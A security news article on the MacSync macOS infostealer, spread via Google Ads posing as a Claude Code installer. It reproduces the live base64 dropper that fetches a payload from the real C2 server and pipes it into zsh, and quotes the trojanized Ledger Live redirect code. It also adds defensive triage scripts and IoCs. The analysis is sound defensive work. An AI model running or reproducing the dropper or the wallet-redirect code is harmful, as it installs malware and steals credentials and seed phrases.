GBHackers

MacSync Stealer Hijacks macOS via Fake Claude Code Google Ads


MacSync Stealer is a newly discovered macOS infostealer actively distributed through a sophisticated malvertising campaign on Google Ads that impersonates Anthropic’s Claude Code CLI.

Security researchers from Beelzebub have uncovered the complete attack chain, revealing a multi-stage infection process that spans from social engineering to deep system compromise, credential harvesting, and persistent hijacking of crypto wallets.

Attack Chain Overview (Source: Beelzebub)

MacSync Stealer Hijacks macOS

The campaign begins with a sponsored Google advertisement targeting developer-centric queries such as “claude code mac install.” Victims are redirected to a malicious Google Sites page that mimics a legitimate installation portal.

Lure page built to mimic the real Anthropic website (Source: Beelzebub)

This lure abuses trust in Google’s infrastructure and evades automated scanners by dynamically rendering content via JavaScript. The page instructs users to execute a seemingly harmless terminal command, a technique aligned with the “InstallFix” social engineering pattern commonly used against developers.

The initial payload is delivered through a triple-encoded zsh dropper. The command embedded on the fake site decodes into a secondary script that silently downloads additional payloads from a command-and-control (C2) server over plaintext HTTP:

echo 'ZWNobyAnVmVyaWZpY2F0aW9uIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1rZnNTTCBodHRwOi8vb2tsYWhvbWF3YXJlaG91c2luZy5jb20vY3VybC9iZDM0OGE0MDI2MWFhMmQ5NTU2NmNjZGM0ZTZmMzA0ZmYyNWFhOTdkMzRlNWM3MTNjNzdjOTM3NTgzYWQwNGYwfHpzaA==' | base64 -D | zsh

Once executed, the dropper initiates a three-stage infection chain. Stage one retrieves a .daily payload from the C2. Stage two decodes a base64+gzip embedded script with randomized variable names to evade signature detection. Stage three executes a silent daemon that fetches the primary AppleScript-based stealer and handles data exfiltration.
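The dropper shape described above, as a static triage script added here (not code from the article or from Beelzebub): it peels the echo '<base64>' | base64 -D | zsh layers, gunzipping a layer when it carries the gzip magic as the page says stage two does, then extracts the URLs and the risk flags a defender would pull into an alert. The input is the article's own one-liner; the function names are my own.

```python
import base64
import gzip
import re

# Dropper one-liner quoted in the article (the page's own sample, not constructed).
DROPPER = (
    "echo 'ZWNobyAnVmVyaWZpY2F0aW9uIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1rZnNTTCBodHRwOi8v"
    "b2tsYWhvbWF3YXJlaG91c2luZy5jb20vY3VybC9iZDM0OGE0MDI2MWFhMmQ5NTU2NmNjZGM0ZTZmMzA0"
    "ZmYyNWFhOTdkMzRlNWM3MTNjNzdjOTM3NTgzYWQwNGYwfHpzaA==' | base64 -D | zsh"
)
# Shape of one encoding layer: echo '<base64>' | base64 -D (or -d/--decode) | zsh/bash/sh
_LAYER_RE = re.compile(
    r"echo\s+'([A-Za-z0-9+/=]+)'\s*\|\s*base64\s+(?:-[dD]|--decode)\s*\|\s*(?:zsh|bash|sh)\b"
)
_URL_RE = re.compile(r"https?://[^\s'\"|;&]+")

def decode_layer(blob):
    """Base64-decode one layer (gunzip too if needed); None on malformed input."""
    try:
        data = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if data[:2] == b"\x1f\x8b":  # gzip magic: the page's stage two is base64+gzip
        data = gzip.decompress(data)
    return data.decode("utf-8", errors="replace")

def peel_layers(command, max_depth=10):
    """Return the decoded inner scripts, outermost first, until no layer remains."""
    layers, current = [], command
    for _ in range(max_depth):
        m = _LAYER_RE.search(current)
        inner = decode_layer(m.group(1)) if m else None
        if inner is None:
            break
        layers.append(inner)
        current = inner
    return layers

def analyze(command):
    """Static triage: peel the layers, then pull URLs and risk flags from every layer."""
    texts = [command] + peel_layers(command)
    joined = "\n".join(texts)
    urls = sorted(set(_URL_RE.findall(joined)))
    return {
        "layers": len(texts) - 1,
        "urls": urls,
        "plaintext_http": any(u.startswith("http://") for u in urls),
        # curl -k disables TLS verification, also inside a combined group such as -kfsSL
        "curl_insecure": re.search(r"\bcurl\s+(?:\S+\s+)*-[A-Za-z]*k", joined) is not None,
        # fetched content piped straight into an interpreter
        "pipes_to_shell": re.search(r"\|\s*(?:zsh|bash|sh)\b", joined) is not None,
    }
```

Run analyze() over the command a user is about to paste, or over shell history collected during incident response, and alert on any result with layers greater than zero or pipes_to_shell set.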

Step-by-step guide targeting users (Source: Beelzebub)

The core payload, identified as MacSync Stealer v1.1.2 (build tag: claude1), is delivered via osascript. It begins by terminating the Terminal process to erase evidence, then deploys a fake macOS System Preferences dialog to harvest the user’s login password. The password is validated using dscl . authonly, ensuring stealth without triggering system alerts.

With valid credentials, the malware unlocks the macOS keychain. It extracts the Chrome Safe Storage key, enabling decryption of saved credentials across Chromium-based browsers. It also collects extensive data, including browser profiles, cookies, SSH keys, AWS credentials, Telegram sessions, and over 80 cryptocurrency wallet extensions.

All harvested data is staged in /tmp/sync*/ and compressed into /tmp/osalogging.zip. Exfiltration occurs in 10MB chunks via HTTP PUT requests to the C2. Because the ZIP format requires the complete archive before it can be opened, the process depends on full transmission: an interrupted upload leaves the stolen data unusable to the attacker.

A secondary payload introduces persistence by targeting cryptocurrency applications. If Ledger Live or Ledger Wallet is installed, the malware replaces their Electron app.asar bundles with trojanized versions. A single injected line marked with a Russian comment (ВСТАВЬТЕ СЮДА, “INSERT HERE”) redirects the application interface to a phishing recovery flow after launch:

setTimeout(() => {
  e.loadURL("file://" + path.join(__dirname, "recovery-step-1.html"));
}, 5000);

This delayed execution ensures the application appears legitimate before prompting victims to enter their seed phrases, which are then exfiltrated to the attacker’s infrastructure.
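An added host-triage helper for the trojanization described above (not code from the article or from Beelzebub): it checks a Ledger Live app.asar for the injected redirect and the marker comment quoted above, compares its hash with the trojanized-bundle SHA256 from the IoC list, and looks for the /tmp staging artifacts. The asar fragment is constructed and the function names are my own; it assumes asar archives store their JavaScript uncompressed, which is how the format works.

```python
import glob
import hashlib
import os
import re

# Hash from the article's IoC list; markers from the injected line it quotes.
TROJANIZED_ASAR_SHA256 = "1abf943e97356e07bde23663da544e7c106afc19827a2106361a52035737de43"
ASAR_MARKERS = [
    (re.compile(r"ВСТАВЬТЕ\s+СЮДА"), "Russian marker comment (INSERT HERE) present"),
    (re.compile(r'loadURL\(\s*"file://"\s*\+\s*path\.join\(__dirname,\s*"recovery-step-1\.html"\)'),
     "renderer redirected to bundled recovery-step-1.html"),
]

def scan_asar_bytes(data):
    """Return findings for one app.asar: known-bad hash plus the injected-code markers."""
    findings = []
    if hashlib.sha256(data).hexdigest() == TROJANIZED_ASAR_SHA256:
        findings.append("sha256 matches the trojanized Ledger Live app.asar in the IoC list")
    text = data.decode("utf-8", errors="ignore")  # asar keeps bundled JS as plain text
    for pattern, label in ASAR_MARKERS:
        if pattern.search(text):
            findings.append(label)
    return findings

def scan_asar_file(path):
    """Convenience wrapper for a path such as .../Ledger Live.app/Contents/Resources/app.asar."""
    with open(path, "rb") as fh:
        return scan_asar_bytes(fh.read())

def find_staging_artifacts(tmp_dir="/tmp"):
    """Staging paths from the IoC list: <tmp>/osalogging.zip and the <tmp>/sync*/ directories."""
    hits = []
    zip_path = os.path.join(tmp_dir, "osalogging.zip")
    if os.path.exists(zip_path):
        hits.append(zip_path)
    hits.extend(sorted(p for p in glob.glob(os.path.join(tmp_dir, "sync*")) if os.path.isdir(p)))
    return hits

# Constructed JS fragment imitating the patched bundle; not a real app.asar.
SAMPLE_PATCHED = (
    "function show(e){ e.loadURL(indexUrl); // ВСТАВЬТЕ СЮДА\n"
    "setTimeout(() => {\n"
    '  e.loadURL("file://" + path.join(__dirname, "recovery-step-1.html"));\n'
    "}, 5000);\n}"
).encode("utf-8")
SAMPLE_CLEAN = b"function show(e){ e.loadURL(indexUrl); }"
```

A clean bundle should also pass codesign verification of the application; a marker hit without a hash match means a variant of the injected file rather than the exact sample the researchers saw.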

Notably, the attack chain includes an unintended execution gate: a blocking dialog halts further actions until the user interacts with it. If the victim reboots or interrupts execution before clicking, both exfiltration and wallet trojanization may fail, thereby limiting the attacker’s success.

Indicators of Compromise (IOCs)

  • Malware Name: MacSync Stealer v1.1.2 (claude1)
  • Dropper SHA256: bd348a40261aa2d95566ccdc4e6f304ff25aa97d34e5c713c77c937583ad04f0
  • C2 Domain: oklahomawarehousing[.]com
  • Key Paths: /dynamic, /gate, /curl, /ledger/live
  • API Key: 5190ef1733183a0dc63fb623357f56d6
  • Lure URL: sites[.]google[.]com/view/claud-version-0505
  • Trojanized Ledger Live SHA256: 1abf943e97356e07bde23663da544e7c106afc19827a2106361a52035737de43
  • File Artifacts: /tmp/osalogging.zip, /tmp/sync*/

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

This campaign highlights the growing effectiveness of malvertising combined with developer-targeted social engineering. By chaining credential theft with persistent wallet hijacking, MacSync Stealer demonstrates a dual-impact threat model that compromises both system access and high-value crypto assets in a single infection flow.
